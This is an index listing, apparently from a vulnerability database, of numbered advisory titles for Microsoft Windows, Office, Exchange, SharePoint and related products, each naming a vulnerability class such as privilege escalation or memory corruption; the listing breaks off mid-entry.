Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [149941] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [149940] Microsoft Windows up to Server 2019 Win32k privilege escalation [149939] Microsoft Windows up to Server 2019 Win32k privilege escalation [149938] Microsoft Windows up to Server 2019 Win32k privilege escalation [149937] Microsoft Windows up to Server 2019 Win32k privilege escalation [149936] Microsoft Windows up to Server 2019 Win32k privilege escalation [149935] Microsoft Windows up to Server 2019 Win32k privilege escalation [149934] Microsoft Windows up to Server 2019 Win32k privilege escalation [149933] Microsoft Windows up to Server 2019 Win32k privilege escalation [149932] Microsoft Windows up to Server 2019 Win32k information disclosure [149931] Microsoft Windows up to Server 2016 Win32k information disclosure [149930] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [149929] Microsoft Windows up to Server 2019 DirectX information disclosure [149928] Microsoft Windows 10/Server 2016 DirectX privilege escalation [149927] Microsoft Windows up to Server 2019 Imaging Library memory corruption [149926] Microsoft Windows up to Server 2019 IME privilege escalation [149923] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure [149922] Microsoft Windows up to Server 2019 Wireless Network Manager privilege escalation [149921] Microsoft Windows up to Server 2019 Backup Service privilege escalation [149920] Microsoft Windows up to Server 2019 Client License Service privilege escalation [149919] Microsoft Windows up to Server 2019 Telephony Service information disclosure [149917] Microsoft Office up to 2019 Security Feature privilege escalation [149915] Microsoft SharePoint Enterprise Server 2013 P1/2016/2019 cross site scripting [149914] Microsoft Exchange Server 2013 CU23/2016 CU14/2016 CU15/2019 CU3/2019 CU4 Exchange Web Services privilege escalation [149913] Microsoft Windows up to Server 2019 Win32k privilege escalation [149910] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [149909] Microsoft Windows up to Server 2019 COM Server privilege escalation [149907] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149906] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149905] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149904] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [149903] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149902] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149901] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149900] Microsoft Windows up to Server 2019 Kernel privilege escalation [149899] Microsoft Windows up to Server 2019 Kernel privilege escalation [149898] Microsoft Windows up to Server 2019 Kernel privilege escalation [149897] Microsoft Windows up to Server 2019 Kernel privilege escalation [149896] Microsoft Windows up to Server 2019 Kernel privilege escalation [149895] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149894] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149893] Microsoft Windows up to Server 2019 Active Directory privilege escalation [149891] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [149890] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [149889] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [149888] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [149887] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [149886] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [149884] Microsoft Windows up to Server 2019 Media Foundation memory corruption [149883] Microsoft Windows up to Server 2019 LNK privilege escalation [149882] Microsoft Windows up to Server 2019 memory corruption [149881] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [149880] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [149312] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [149039] Microsoft Windows 10 1803/Server 2019 RDP Session Lockscreen weak authentication [148654] Microsoft Windows up to Server 2019 Memory Section privilege escalation [148653] Microsoft Windows up to Server 2019 Win32k privilege escalation [148652] Microsoft Windows up to Server 2019 Media Service privilege escalation [148651] Microsoft Windows up to Server 2019 Update Notification Manager privilege escalation [148649] Microsoft Windows up to Server 2019 Symbolic Link privilege escalation [148648] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [148637] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [148634] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [148631] Microsoft Windows Server 2016/Server 2019 Remote Desktop Gateway privilege escalation [148629] Microsoft Windows up to Server 2019 Hard Link privilege escalation [148627] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [148618] Microsoft Office up to 2019 for Mac memory corruption [148617] Microsoft Excel up to 2019 for Mac memory corruption [148616] Microsoft Excel up to 2019 for Mac memory corruption [148614] Microsoft Windows up to Server 2019 GDI+ information disclosure [148613] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [148611] Microsoft Windows up to Server 2016 Graphics Component information disclosure [148610] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [148609] Microsoft Windows up to Server 2019 Win32k information disclosure [148608] Microsoft Windows up to Server 2019 Graphics Component information disclosure [148607] Microsoft Windows up to Server 2019 CryptoAPI Crypt32.dll weak authentication [146927] Microsoft Skype for Business Server 2019 CU2 privilege escalation [146924] Microsoft Windows up to Server 2019 Defender memory corruption [146920] Microsoft Visual Studio 2019 Redirect [146879] Microsoft Windows up to Server 2019 OLE privilege escalation [146878] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [146874] Microsoft Windows 10 1809/Server 2019 Printer Service privilege escalation [146873] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [146872] Microsoft Windows up to Server 2019 Kernel information disclosure [146871] Microsoft Windows up to Server 2019 Kernel information disclosure [146870] Microsoft Windows up to Server 2019 Hyper-V information disclosure [146869] Microsoft Windows up to Server 2019 GDI information disclosure [146868] Microsoft Windows up to Server 2019 GDI information disclosure [146867] Microsoft Windows up to Server 2019 GDI information disclosure [146866] Microsoft Office up to 2019 Excel information disclosure [146865] Microsoft Office up to 2019 Access information disclosure [146864] Microsoft Office up to 2019 PowerPoint privilege escalation [146863] Microsoft Office up to 2019 Word privilege escalation [146862] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [146861] Microsoft Office up to 2019 Access information disclosure [146858] Microsoft Windows up to Server 2019 Win32k information disclosure [146857] Microsoft Windows up to Server 2016 Win32k privilege escalation [146855] Microsoft Windows up to Server 2019 Win32k Graphics privilege escalation [145418] Microsoft Office 2016/2019 on Mac Excel privilege escalation [145412] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145402] Microsoft Windows up to Server 2019 OpenType Font Parser memory corruption [145400] Microsoft Office up to 2019 Excel memory corruption [145398] Microsoft Office up to 2019 Excel information disclosure [145396] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Upload privilege escalation [145395] Microsoft SharePoint Server 2019 Security Feature privilege escalation [145394] Microsoft Windows up to Server 2019 Win32k information disclosure [145393] Microsoft Windows up to Server 2019 GDI information disclosure [145390] Microsoft Windows up to Server 2019 Win32k information disclosure [145388] Microsoft Windows up to Server 2012 R2 Win32k privilege escalation [145386] Microsoft Windows up to Server 2012 R2 DirectWrite information disclosure [145385] Microsoft Visual Studio 2017 15.9/2019 16.0/2019 16.3 Archive privilege escalation [145384] Microsoft Windows up to Server 2019 NetLogon Security Feature privilege escalation [145382] Microsoft Windows up to Server 2019 iphlpsvc.dll privilege escalation [145380] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [145379] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [145377] Microsoft Windows up to Server 2019 Installer privilege escalation [145375] Microsoft Windows up to Server 2012 R2 OpenType Font Driver ATMFD.dll information disclosure [145374] Microsoft Windows up to Server 2019 DirectWrite information disclosure [145373] Microsoft Windows up to Server 2019 Remote Procedure Call information disclosure [145372] Microsoft Windows up to Server 2019 Win32k privilege escalation [145370] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [145368] Microsoft Office up to 2019 information disclosure [145367] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145366] Microsoft Windows up to Server 2019 Win32k privilege escalation [145365] Microsoft Windows up to Server 2019 Win32k privilege escalation [145364] Microsoft Windows up to Server 2019 Win32k privilege escalation [145363] Microsoft Windows up to Server 2019 Win32k privilege escalation [145362] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 Kernel privilege escalation [145361] Microsoft Windows up to Server 2019 privilege escalation [145360] Microsoft Windows up to Server 2019 Certificate Dialog privilege escalation [145359] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [145358] Microsoft Windows up to Server 2019 Netlogon privilege escalation [145357] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [145356] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [145355] Microsoft Windows up to Server 2019 Servicing Stack information disclosure [145353] Microsoft Windows 10 1809/10 1903/Server 2019 Data Sharing Service privilege escalation [145352] Microsoft Windows up to Server 2019 Error Reporting information disclosure [145350] Microsoft Windows up to Server 2019 TCP/IP Stack information disclosure [145349] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145348] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145346] Microsoft Windows up to Server 2019 Kernel information disclosure [145345] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145344] Microsoft Windows up to Server 2019 privilege escalation [145343] Microsoft Exchange Server 2013 CU23/2016 CU13/2016 CU14/2019 CU2/2019 CU3 Metadata privilege escalation [145340] Microsoft Windows up to Server 2019 OpenType Font Parser memory corruption [145334] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145333] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145332] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [145331] Microsoft Windows up to Server 2019 Hyper-V Switch privilege escalation [143118] Microsoft Windows up to Server 2019 IIS memory corruption [143113] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [143112] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [143103] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [143102] Microsoft Windows up to Server 2019 Power Service umpo.dll privilege escalation [143101] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [143100] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143098] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client information disclosure [143097] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client privilege escalation [143096] Microsoft Windows up to Server 2019 Kernel information disclosure [143095] Microsoft Excel up to 2019 for Mac memory corruption [143091] Microsoft Excel up to 2019 for Mac memory corruption [143090] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [143089] Microsoft Windows up to Server 2019 rdbss.sys memory corruption [143088] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client privilege escalation [143084] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143083] Microsoft Windows up to Server 2019 TLS information disclosure [143082] Microsoft Windows up to Server 2019 Hardlink privilege escalation [143081] Microsoft Windows up to Server 2019 Setup privilege escalation [143080] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143077] Microsoft Windows up to Server 2019 Imaging API memory corruption [143076] Microsoft Windows 10 1703/10 1709/10 1803/Server 1803/Server 2019 Hyper-V privilege escalation [143075] Microsoft Windows up to Server 2019 NTLM MIC weak authentication [143071] Microsoft Windows up to Server 2019 MS XML XML External Entity [143063] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [141652] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [141639] Microsoft SharePoint Foundation 2013 SP1 cross site request forgery [141637] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [141633] Microsoft Excel up to 2019 memory corruption [141631] Microsoft Windows up to Server 2019 SMB Client Driver information disclosure [141630] Microsoft Windows up to Server 2019 memory corruption [141629] Microsoft Windows up to Server 2019 Update Delivery Optimization privilege escalation [141627] Microsoft Windows up to Server 2019 GDI information disclosure [141626] Microsoft Windows up to Server 2019 Win32k privilege escalation [141621] Microsoft Windows up to Server 2019 Kernel information disclosure [141620] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [141619] Microsoft Windows up to Server 2019 ALPC privilege escalation [141618] Microsoft Windows up to Server 2019 hdAudio.sys privilege escalation [141617] Microsoft Windows up to Server 2019 Store Installer privilege escalation [141616] Microsoft Windows up to Server 2019 ALPC privilege escalation [141615] Microsoft Windows up to Server 2019 Winlogon privilege escalation [141614] Microsoft Windows up to Server 2019 Compatibility Appraiser privilege escalation [141613] Microsoft Exchange Server 2016 CU12/2016 CU13/2019 CU1/2019 CU2 Outlook Web App privilege escalation [141611] Microsoft Office up to 2019 Security Feature privilege escalation [141610] Microsoft Excel up to 2019 information disclosure [141609] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [141608] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site request forgery [141607] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016/2019 privilege escalation [141606] Microsoft Windows up to Server 2019 Win32k privilege escalation [141605] Microsoft Windows up to Server 2019 Hyper-V information disclosure [141604] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [141603] Microsoft Windows up to Server 2019 GDI information disclosure [141602] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141601] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141600] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141599] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141598] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141597] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141596] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141595] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141594] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141593] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141592] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141591] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141590] Microsoft Windows up to Server 2019 Text Service Framework privilege escalation [141589] Microsoft Exchange Server 2016 CU12/2016 CU13/2019 CU1/2019 CU2 memory corruption [141583] Microsoft Lync Server 2013 Conference information disclosure [141581] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [141580] Microsoft Windows up to Server 2019 Transaction Manager information disclosure [141579] Microsoft Windows up to Server 2016 DirectX information disclosure [141577] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [141575] Microsoft Windows up to Server 2019 lnk File privilege escalation [141566] Microsoft SharePoint Enterprise Server 2010 SP1/2013 SP1/2016/2019 API privilege escalation [141565] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 API privilege escalation [141564] Microsoft SharePoint Enterprise Server 2010 SP1/2013 SP1/2016/2019 Markup privilege escalation [141561] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [141560] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [139972] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139971] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139970] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139969] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139968] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139965] Microsoft Windows up to Server 2019 Kernel information disclosure [139964] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [139963] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [139962] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [139960] Microsoft Windows up to Server 2019 DHCP Server memory corruption [139958] Microsoft Windows up to Server 2019 DHCP Server memory corruption [139957] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [139956] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 Session Object information disclosure [139955] Microsoft Windows up to Server 2019 SyncController.dll privilege escalation [139949] Microsoft Windows up to Server 2019 XmlLite Runtime XmlLite.dll XML External Entity [139942] Microsoft Windows up to Server 2019 rpcss.dll privilege escalation [139941] Microsoft Windows up to Server 2019 DirectX privilege escalation [139937] Microsoft Windows up to Server 2019 Azure Active Directory information disclosure [139936] Microsoft Windows up to Server 2019 SymCrypt information disclosure [139935] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 NTFS privilege escalation [139934] Microsoft Windows 7 SP1/Server 2018 R2 SP1/Server 2018 SP2 Win32k privilege escalation [139933] Microsoft Windows up to Server 2019 p2pimsvc privilege escalation [139932] Microsoft Windows up to Server 2019 Kernel privilege escalation [139931] Microsoft Windows up to Server 2019 File Signature Security Feature 7PK Security Features [139930] Microsoft Windows up to Server 2019 ALPC privilege escalation [139928] Microsoft Windows up to Server 2019 Kernel privilege escalation [139927] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139926] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139925] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139924] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139922] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139921] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139920] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139919] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139918] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139917] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139916] Microsoft Windows up to Server 2019 XML Core Services MSXML Parser XML External Entity [139914] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139913] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139912] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Hyper-V Network Switch privilege escalation [139911] Microsoft Windows up to Server 2019 memory corruption [139910] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139909] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139908] Microsoft Windows up to Server 2019 Bluetooth weak encryption [139907] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139906] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139902] Microsoft Word up to 2019 memory corruption [139901] Microsoft Outlook up to 2019 memory corruption [139895] Microsoft Windows up to Server 2019 lnk File privilege escalation [139894] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [139893] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [139892] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [139891] Microsoft Windows up to Server 2019 Font Library privilege escalation [139890] Microsoft Windows up to Server 2019 Font Library privilege escalation [139889] Microsoft Windows up to Server 2019 Font Library privilege escalation [139888] Microsoft Windows up to Server 2019 Font Library privilege escalation [139887] Microsoft Windows up to Server 2019 Font Library privilege escalation [139886] Microsoft Windows up to Server 2019 Font Library privilege escalation [139880] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [139879] Microsoft Windows up to Server 2019 DHCP Client memory corruption [139878] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139877] Microsoft Outlook up to 2019 memory corruption [139876] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139875] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [137589] Microsoft Exchange Server 2013 CU23/2016 CU12/2016 CU13/2019 CU1/2019 CU2 cross site scripting [137588] Microsoft Exchange Server 2010 SP3/2013 CU23/2016 CU12/2016 CU13 Web Services privilege escalation [137587] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [137586] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [137585] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [137584] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137583] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137581] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137580] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137579] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137578] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137577] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137576] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137575] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137574] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137568] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [137563] Microsoft Windows up to Server 2019 DirectWrite information disclosure [137562] Microsoft Windows up to Server 2019 Win32k information disclosure [137561] Microsoft Windows up to Server 2019 GDI information disclosure [137560] Microsoft Windows up to Server 2019 GDI information disclosure [137559] Microsoft Windows up to Server 2019 DirectWrite information disclosure [137555] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137554] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137553] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137549] Microsoft Windows up to Server 2016 DLL privilege escalation [137544] Microsoft Windows up to Server 2019 Kernel information disclosure [137542] Microsoft SQL Server 2014 SP2/2016 SP1/2017 privilege escalation [137541] Microsoft Windows up to Server 2019 privilege escalation [137540] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [137539] Microsoft Windows up to Server 2016 DirectX privilege escalation [137538] Microsoft Windows Server 1803/Server 1903/Server 2016/Server 2019 ADFS Security Feature 7PK Security Features [137537] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [137535] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [137533] Microsoft Windows up to Server 2019 SymCrypt privilege escalation [137527] Microsoft Windows up to Server 2019 GDI+ memory corruption [137512] Microsoft Windows up to Server 2019 DHCP memory corruption [136414] Microsoft Azure DevOps Server 2019 cross site request forgery [136349] Microsoft Windows up to Server 2019 Event Viewer eventvwr.msc information disclosure [136348] Microsoft Windows up to Server 2019 Task Scheduler privilege escalation [136347] Microsoft Windows up to Server 2019 AppXSVC privilege escalation [136345] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [136344] Microsoft Windows up to Server 2019 GDI information disclosure [136340] Microsoft Windows up to Server 2019 GDI information disclosure [136337] Microsoft Windows up to Server 2019 Comctl32.dll memory corruption [136336] Microsoft Windows up to Server 2019 Kernel privilege escalation [136335] Microsoft Windows up to Server 2019 NTLM 7PK Security Features [136334] Microsoft Windows up to Server 2019 Kernel information disclosure [136333] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [136330] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [136329] Microsoft SharePoint Server 2016/2019 cross site scripting [136328] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [136327] Microsoft Lync Server 2010/2013 privilege escalation [136326] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136325] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136324] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136323] Microsoft Windows up to Server 2019 memory corruption [136321] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Audio Service privilege escalation [136320] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136319] Microsoft Windows up to Server 2019 Security Credentials 7PK Security Features [136318] Microsoft Windows up to Server 2019 DirectX privilege escalation [136317] Microsoft Windows up to Server 2019 Win32k privilege escalation [136314] Microsoft Windows up to Server 2019 Win32k privilege escalation [136312] Microsoft Windows up to Server 2019 GDI information disclosure [136310] Microsoft Windows up to Server 2019 GDI information disclosure [136308] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136306] Microsoft Windows up to Server 2019 Storage Service privilege escalation [136305] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [136304] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [136303] Microsoft Windows up to Server 2019 Storage Service privilege escalation [136301] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136299] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service 7PK Security Features [136296] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [136295] Microsoft Windows up to Server 2019 ALPC privilege escalation [136293] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136292] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136291] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136290] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136289] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136288] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136287] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136286] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136285] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136284] Microsoft Windows up to Server 2019 Kernel privilege escalation [136276] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136275] Microsoft Windows 10/10 1607/10 1703/10 1709/Server 2016 Hyper-V privilege escalation [136274] Microsoft Windows up to Server 2019 ActiveX memory corruption [136273] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [134745] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [134744] Microsoft Windows up to Server 2019 GDI information disclosure [134743] Microsoft SharePoint Server 2013 SP1/2016 privilege escalation [134742] Microsoft SharePoint Enterprise Server 2016/2019 privilege escalation [134741] Microsoft SharePoint Enterprise Server 2013 SP1/2016 information disclosure [134740] Microsoft SharePoint Enterprise Server 2013 SP1/2016 7PK Security Features [134739] Microsoft SharePoint Foundation 2010 SP2/2013 SP2 privilege escalation [134738] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [134737] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [134736] Microsoft Office 2010 SP2 Access Connectivity Engine Data Processing Error [134735] Microsoft Office up to 2019 Access Connectivity Engine Data Processing Error [134734] Microsoft Office up to 2019 Access Connectivity Engine Data Processing Error [134733] Microsoft Windows up to Server 2019 Unified Write Filter privilege escalation [134731] Microsoft Windows up to Server 2019 Symlink privilege escalation [134729] Microsoft Windows up to Server 2019 Storage Service privilege escalation [134725] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134724] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134723] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134722] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134721] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134720] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134719] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134718] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134717] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134716] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134715] Microsoft Windows up to Server 2019 Win32k privilege escalation [134714] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134713] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134712] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134710] Microsoft Windows up to Server 2019 GDI information disclosure [134709] Microsoft Windows up to Server 2019 Kernel privilege escalation [134706] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [134704] Microsoft SQL Server 2017 Analysis Services information disclosure [134701] Microsoft Windows up to Server 2019 Windows Defender Application Control 7PK Security Features [134700] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [134699] Microsoft Windows up to Server 2019 NDIS ndis.sys privilege escalation [134698] Microsoft Windows up to Server 2019 OLE privilege escalation [134684] Microsoft Windows up to Server 2019 DHCP Server memory corruption [134678] Microsoft Windows up to Server 2019 GDI+ memory corruption [133236] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133235] Microsoft Azure DevOps Server 2019 privilege escalation [133234] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133232] Microsoft Azure DevOps Server 2019 cross site scripting [133229] Microsoft Azure DevOps Server 2019 privilege escalation [133224] Microsoft Exchange Server 2013 CU22/2016 CU11/2016 CU12/2019/2019 CU1 Outlook Web Access privilege escalation [133223] Microsoft Azure DevOps Server 2019 Content Security Policy privilege escalation [133222] Microsoft Windows up to Server 2019 Remote Registry Service memory corruption [133221] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133220] Microsoft Windows up to Server 2019 GDI Memory information disclosure [133219] Microsoft Windows up to Server 2019 Win32k Memory information disclosure [133218] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133217] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133216] Microsoft Windows up to Server 2019 Kernel Memory information disclosure [133215] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [133214] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [133213] Microsoft Windows up to Server 2019 Kernel Memory information disclosure [133212] Microsoft Windows up to Server 2019 Terminal Services Memory information disclosure [133211] Microsoft Windows up to Server 2019 Task Scheduler information disclosure [133209] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133206] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [133205] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [133204] Microsoft Office/Excel up to 2019 memory corruption [133203] Microsoft Office up to 2019 Access Connectivity Engine privilege escalation [133202] Microsoft Office up to 2019 Access Connectivity Engine privilege escalation [133201] Microsoft Office up to 2019 Access Connectivity Engine privilege escalation [133200] Microsoft Office up to 2019 Access Connectivity Engine privilege escalation [133199] Microsoft Office 2010 SP2 Access Connectivity Engine privilege escalation [133198] Microsoft Exchange Server up to 2019 CU1 Outlook Web Access Data Processing Error [133196] Microsoft Windows up to Server 2019 Win32k information disclosure [133195] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133194] Microsoft Windows up to Server 2019 GDI Memory information disclosure [133193] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133192] Microsoft Windows up to Server 2019 OLE Automation memory corruption [133189] Microsoft Windows up to Server 2019 CSRSS privilege escalation [133188] Microsoft Windows up to Server 2019 LUAFV 